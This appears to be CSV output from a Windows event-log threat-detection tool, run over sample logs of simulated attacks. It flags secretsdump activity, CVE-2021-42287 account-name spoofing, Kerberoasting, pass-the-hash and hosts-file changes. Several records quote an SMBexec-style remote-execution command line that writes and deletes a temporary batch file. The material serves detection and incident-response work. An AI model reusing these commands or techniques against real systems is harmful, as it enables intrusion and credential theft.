2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.036 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.084 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx
2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx
2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx
2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,,New Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx
2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx
2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx
2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
